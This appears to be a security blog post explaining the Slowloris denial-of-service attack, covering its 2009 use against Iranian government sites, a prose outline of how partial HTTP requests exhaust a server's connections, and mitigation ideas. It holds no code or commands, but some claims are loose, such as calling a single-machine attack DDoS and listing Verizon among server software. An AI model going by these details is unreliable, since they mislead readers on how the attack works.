Slowloris Attack

Back in the year 2009, there were a series of cybersecurity incidents in Iran that were carried out against Iranian government websites by hacktivists in the region. The primary form of attack? Something called a Slowloris attack. Despite the benign-sounding name, a Slowloris attack can be quite effective when deployed properly. It is not able to easily be detected by normal network security defenses, which makes it very difficult to defend against.

Read on to find out just how this simple yet brilliant attack works. Also, read on to find out how you can defend against it.

slowloris attack

What is a Slowloris Attack?

A Slowloris attack is a type of Distributed-Denial-of-Service attack. Created by a hacker named RSnake, the attack is carried out by a piece of software called Slowloris. The name is derived from the Asian primate; however unlike the real Slow loris, this attack is not adorable. Slowloris allows a single device, such as a personal computer, to take down a server.

Though it originates from one device, which would ordinarily make it a Denial-of-Service attack, it becomes a DDoS attack as it uses multiple connections to attack a server. It can do this without putting a strain on bandwidth. Additionally, it targets the victim’s server only, making it a very efficient attack as no untargeted ports are affected.

The result is a server that is put out of commission without the use of a traditional botnet. This makes Slowloris attack somewhat more advantageous to use, as it is not as “loud” as a full-force attack from thousands of zombie machines. Firewalls can pick up traffic from script kiddies deploying a botnet without any real technical knowledge. When you fire thousands of malformed packets in, say, a span of 10 minutes, most NetSec professionals will notice it.

With a Slowloris attack, however, fewer alarm bells are set off. An IDS (Intrusion Detection System) will be less likely to shut an attack down that is precision-targeted. There are no “malicious” packets being sent during the attack, just incomplete HTTP requests and headers. Additionally, the requests are sent at a relaxed pace so as not to arouse suspicion.

It should be noted that this attack is effective, but it is very slow (hence the pithy name). It can take a long time for the connection to become overloaded with HTTP requests. This goes especially for large websites, such as the Iranian government websites in the infamous 2009 attacks.

what is a slowloris ddos attack

How Does a Slowloris Attack Work?

  1. An attacker decides on a server to target. Popular servers affected by Slowloris include servers from Apache, Verizon, Flask, and Web-sense.
  2. The attack begins by sending out partial HTTP requests.
  3. The HTTP requests never complete, tricking the server.
  4. As a result, the targeted server begins opening up in anticipation for the HTTP requests to complete.
  5. HTTP headers are introduced to the traffic flow. The HTTP headers also never complete.
  6. Eventually, legitimate connections become impossible. The reason for this is that the constant flow of HTTP requests and headers overload the connection pool.
  7. The IDS never notices the issue occurring as the requests are not, at least in theory, malicious.
  8. Before the Sysadmin or blue team can react, the server is knocked out of commission.

How is a Slowloris Attack Mitigated?

It is impossible to prevent a Slowloris attack. Despite this, there are some steps that one can take to mitigate the threat it poses. One step that can be taken is configuring a server to allow more clients (i.e., raise the maximum limit). Another is to force the server to limit IP addresses in terms of how many connections it can have. Some other tactics include shutting down connections at a faster rate and restricting the minimum connection speed.

The way these tactics mitigate a Slowloris are fairly simple. These configurations effectively kneecap an attacker by not allowing the very conditions they need. Without the ability to stay connected for long periods, and without numerous connections sending out HTTP requests, the Slowloris attack becomes difficult to pull off.

This is not a bulletproof plan, as the attack can still be attempted. All an attacker needs is a lot of time on their hands and patience. There are still more methods one can try, however, like certain firewall configurations and reverse proxies. These also have their limitations, though, and cannot entirely prevent the Slowloris attack.

video_thumb